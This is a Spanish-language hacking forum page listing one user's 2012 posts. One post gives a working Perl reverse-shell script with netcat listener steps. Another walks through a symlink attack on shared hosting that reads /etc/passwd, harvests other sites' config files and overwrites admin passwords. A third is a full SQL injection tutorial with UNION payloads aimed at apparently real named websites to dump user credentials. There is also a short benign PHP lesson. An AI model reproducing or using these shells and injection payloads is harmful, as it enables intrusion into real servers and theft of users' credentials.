Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Okol

Páginas 1 2 3 4

#61

Bugs y Exploits / Como hacer una BackConect By Okol

Septiembre 09, 2012, 09:12:23 PM

Hola, Ya de regreso por este foro tan bello

Publicare un pequeño tuto de una forma de hacer backconect con CMD (Windows) & Una shell en algun servidor...

Ok lo primero que haremos sera habrir el cmd y ejecutar el netcat
¿Como? Ok les explico...

Bajamos el Netcat You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Lo metemos al disco C renombrandolo nc

Ok ahora habrimos cmd y ejecutamos cd.. dos veces para que quede asi:

Despues de eso ejecutamos cd nc Nos quedaria algo asi

Ok ya tenemos el Netcat abierto ahora le diremos Pon ala escucha "Tal puerto" ¿Como? Ejecutando el comando nc -lnvp puerto, En mi caso seria nc -lnvp 113

Quedaria asi:

Ok ya tenemos ala escucha el puerto...

Ahora nos bajamos un Backdoor.. yo usare este

Código: text

#By xDarkSton3x
#2011
#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "########################################\n";
print "#   Back Connect Script By xDarkSton3x       #\n";
print "########################################\n";
system("/bin/sh -i");
#Contact: [email protected]

(Esta en Perl)
Ok ahora subimos a nuestra phpshell el script con nombre.txt ejemplo back.txt

Ya que tenemos arriva el back.txt vamos a ejecutar un comando y ejecutamos...

perl back.txt ip puerto Asi:

Despues de eso deveriamos recivir en el netcat algo asi...

Si se quieren ahorrar lo de el script en perl les dejo una shell con opcion de backconect donde solo pones tu ip y el puerto y te llega al netcat

La shell es:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
(No la pongo en code porque no permite tantos caracteres)

Saludos

#62

Bugs y Exploits / Re:Symlink con la tool

Agosto 02, 2012, 06:49:44 PM

Hacer symlink es rooting? :S segun yo no... tiosam porque dice asi tu video? D:

#63

Bugs y Exploits / Re:Tutorial Sqli Manual By Okol

Mayo 22, 2012, 01:04:36 PM

siiii disculpa del 1 al 6 o del 0 al 5 disculpame hermano ya lo corrijo esque no lo habia leido bien antes e postear

#64

Bugs y Exploits / Re:Tutorial Sqli Manual By Okol

Mayo 21, 2012, 09:39:53 PM

claro hermano disculpa ya te pongo :$ tu me enseñaste todo jajaja

#65

Bugs y Exploits / Re:Symlink con la tool

Mayo 21, 2012, 03:11:10 PM

disculpa bro ya lo corrijo
Gracias por complementar

#66

Bugs y Exploits / Symlink con la tool

Mayo 21, 2012, 02:28:00 PM

Hola amigos del foro hoy les dare un tutorial de Symlink pero con la TOOL's despues enseñare a hacerlo manual espero les guste Empezamos

Bueno primero tenemos una shell subida

1- Creamos un directorio que quede algo asi
Public_Html/tudirectorio en este caso Public_html/okol

2- en ese directorio subimos el archivo en perl
Descarga You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

3- Le das permisos 775 con este comando
chmod 775 You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

4- Subimos un .htaccess a el directorio nuevo (okol)
Descarga You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

5-Ahora ejecutamos este comando en la shell
cat /etc/passwd

6-Copiamos TODO lo que salga en la consola y abrimos You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login la web que estamos cagando xD)

7- pegamos todo en el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y le damos a buscar

8- Entramos a el directorio You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y VUALA Tenemos los config.php de todas las webs alojadas en ese shared ahora lo que sigue

9- desde la shell vas a la opcion SQL y pones los datos de la db de los .txt que salen ahi

10- Buscas Users

11- encryptas la pass que quieres en md5 y la pegas en donde dice password

12- hay scripts que te dicen que dominio es para que accedas o en el mismo config.php si es joomla te sale en el sitename o queda buscar en google

Espero les haya gustado el tuto amigos

Saludos

#67

Bugs y Exploits / Re:Tutorial Sqli Manual By Okol

Mayo 21, 2012, 01:51:02 PM

Si bro la verdad me ezforze pero lo ise desde 0
Gracias x sus comentarios
SALUDOS

#68

Bugs y Exploits / Re:Tutorial Sqli Manual By Okol

Mayo 20, 2012, 09:15:49 PM

Si cronos para mi me gusta esta forma de hacerlo se que hay mas pero
mientras no usen tools cualquier forma de sqli manual es buena
Saludos BRO!

#69

Bugs y Exploits / Tutorial Sqli Manual By Okol

Mayo 20, 2012, 08:51:16 PM

Hola amigos me ezforze mucho escribiendo este tuto para uds espero les guste

Saludos

Sqli Manual

en este caso una variable aki viene siendo

Código: text

http://www.icvp.mx/enfermedades_detalle.php?id=5

la variable id resultado de la variable 5un ejemplo

Código: text

http://www.icvp.mx/enfermedades_detalle.php?id=5&ref=google&a=b

vendrian siendo las variables
id
ref
co
a

Código: text

http://www.icvp.mx/enfermedades_detalle.php?id=5&ref=google.com&g=d&cos=sss

si queeremos comprobar que la variable g es vulnerable donde pondriamos la comilla?

Código: text

http://www.icvp.mx/enfermedades_detalle.php?id=5&ref=google.com&g=d'&cos=sss

cuando verifiques si una variable es vulnerable pruebas asi:

Código: text

http://gogo.com/index.php?var=vuln' y http://gogo.com/index.php?var='vuln

de las dos maneras pruebas

para saber cuantas columnas tiene podemos poner

Código: text

http://www.icvp.mx/enfermedades_detalle.php?id=5+order+by+6

si ponemos

Código: text

http://www.icvp.mx/enfermedades_detalle.php?id=5+order+by+7

sale ke no existe pero con 6 sale bien quiere decir que tiene 6
columnas

Código: text

http://www.icvp.mx/enfermedades_detalle.php?id=5+union+select+1,2,3,4,5,6,

salta normal

Código: text

http://www.icvp.mx/enfermedades_detalle.php?id=5+union+select+1,2,3,4,5,6,7

salta error quiere decir que es la 6

notA: una injeccion siempre deve tener -- al final ejemplo
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

tambien se puede hacer

Código: text

http://www.icvp.mx/enfermedades_detalle.php?id=5+union+select+0,1,2,3,4,5--

(Desde el 1 al 6 o desde 0 al 5) es lo mismo

Para que query se vuelva negativo y sake un error hay ke poner un - antes de la variable vulnerable
ejemplo

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Salen unos numeros botados por ahi en este caso es el 4 si le damos click a el error que sale
salen los numeros 4 3 y 6

Cada numero esta involucrado en la injeccion

Código: text

ejemplo http://www.icvp.mx/enfermedades_detalle.php?id=-5+union+select+0,1,2,3,4,5,--

saldrian 5 3 2

esos numeros estan haciendo querys ala db

con este comando database()

se saca el nombre de la db
Como?

sustituimos un numero ke imprime 5 3 o 2 ejemplo

Código: text

http://www.icvp.mx/enfermedades_detalle.php?id=-5+union+select+0,1,2,3,4,database()--

para ver la version de PHP enves de poner database()

se pone version()

(en otro numero que imprima en estecaso 2) ejemplo

Código: text

http://www.icvp.mx/enfermedades_detalle.php?id=-5+union+select+0,1,version(),3,4,5--

Para sacar las tablas...

cuando quieras sacar informacion de las tablas nombres o cantidad de tablas lo sacamos de
information_schema.tables

y cuando sea de columnas

information_schema.colums

si queremos sacar las columnas la url seria asi

Código: text

http://www.tacosaltos.com/index2.php?o=CA&catID=-4+union+select+1,column_name,3,4,5,6+FROM+information_schema.columns--

y las tablas

Código: text

http://www.tacosaltos.com/index2.php?o=CA&catID=-4+union+select+1,table_name,3,4,5,6+FROM+information_schema.tables--

en algunos casos nos sale solo 1 tabla para ir sabiendo mas tablas

aplicamos LIMIT+1+1--
LIMIT+2+1-- asi succesivamente

Código: text

http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+information_schema.tables+LIMIT+4,1--

ya que sacamos las tablas encontramos la tabla usuarios users o algo asi

Código: text

http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+information_schema.tables+LIMIT+49,1--

ya tenemos eso ahora que hacemos?
encriptamos la tabla en ascii to hex
les recomiendoe sta web para encryptarlo You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Ok ahora en la url sustituimos los table_name por column_name y en information_schema.tables ponemos
information_schema.columns seguido de un +where+table_name=el codigo encriptado(le agregamos un 0x al inicio y le quitamos los espacios)
y el limit lo ponemos en 1,1
Quedaria algo asi

Código: text

http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+information_schema.columns+where+table_name=0x7573657273+LIMIT+1,1--

ven la url? nos tira username ahora moveremos el 1,1 asi 2,1 3,1 sucesivamente hasta que salga pass o algo parecido

Ahora borramos hasta que quede la injeccion normal algo asi

Código: text

http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+

donde dice from+ le ponemos el nombre de la tabla (users) quedaria asi

Código: text

http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+users--

cambiamos el column_name por el nombre de la columna que queremos ejemplo

Código: text

http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+users--

Código: text

http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+users--

Si tienen dudas ami privado amigos
Gracias Dedalo - me enseño como

Saludos

#70

Bugs y Exploits / Re:Symlink - Detrás de la t00l

Mayo 08, 2012, 02:50:22 PM

Wooow habeces uno cree que con la tool en perl puede hacer muchas cosas pero me agrada la gente como tu que busca otras alternativas y respecto ala t00lsita
la espero con ancias

SALUDOS BRO

#71

Back-end / Empesando Con el PHP By OKOL [echo br comentarios y algo de variables]

Abril 18, 2012, 12:12:23 AM

Hola bueno empesando con este hermozo lenguaje llamado PHP
que mi gran maestro XT3MP me esta enseñando les dejare lo que aprendi hoy

Bueno mi primer clase de PHP se trato de esto

Para iniciar un archivo en php es

Código: php

<?php
//y para terminarlo
?>

echo es el valor que imprimira en la pantalla un ejemplo echo 'Primera clase';

Código: php

<?php
echo 'Okol Aprendiz php';
?>

el ; indica cierre de linea y para pasar a otra linea es asi

Código: php

<?php
echo 'Okol<br />';
echo 'aprendiz PHP';
?>

el primer ejemplo seria:
Okol aprendiz php

y el segundo:
Okol
aprendiz PHP

y si ponemos digamos

Código: php

<?php
echo 'okol';
echo 'aprendiz PHP';
?>

quedaria asi: okol aprendiz PHP

un ejemplo un poco mas avanzado seria

Código: php

<?php
echo 'Me llamo Okol<br />';
echo 'Tengo 16 años<br />';
echo 'Y estudio PHP';
?>

Los comentarios en PHP

Un comentario es un texto que no se imprimira en pantalla pero sirve para indicar
las notas de el codigo un ejemplo de un comentario seria

Código: php

<?php
echo 'Hola gente<br />';
echo 'Me llamo Okol< br />';
echo 'y tengo 16 años';
?>

Con comentarios seria

Código: php

<?php
#Esto Imprime Hola gente
echo 'Hola gente<br />';
//Esto imprime Me llamo Okol
echo 'Me llamo Okol<br />';
/*
Esto Imprime Tengo 16 años
*/
echo 'Tengo 16 años'
?>

las 3 tipos de comentarios # en una linea // en una linea

/*
en 2 lineas
*/

Variables

Existen 4 tipos de variables.
String > Cadena de texto
Integer > Numero entero
Double o Float > Numero con decimales
Boolean o Boleano > Verdadero o falso, true o false, 1 o 0.

Concatenacion de variables
Es unir texto con alguna variable o función
un ejemplo

Código: php

<?php
$ComoMeLLamo = 'Okol';
echo 'Que tal '.$ComoMeLLamo.' Esta es la concatenacion de variables';
?>

Lo que se imprimiria en pantalla seria Que tal Okol esta es la concatenacion de variables

el punto (.) es lo que une las variables

#72

Dudas y pedidos generales / Ayuda zeus 2.8.9

Abril 16, 2012, 02:12:06 PM

Hola amigos bueno hoy estaba kakeando en un servidor para aprender y bueno me encontre con esto

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (es link de screnshot)

bueno despues de encontrarme con eso me dijeron que me conectara ala db con una shell y ya lo ise

me conecto a jos_users asi You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

ahora muchos me dijeron que cambiara el pass si lose pero que coño en que hash o eso es lo que no me explico :S espero puedan responderme

#73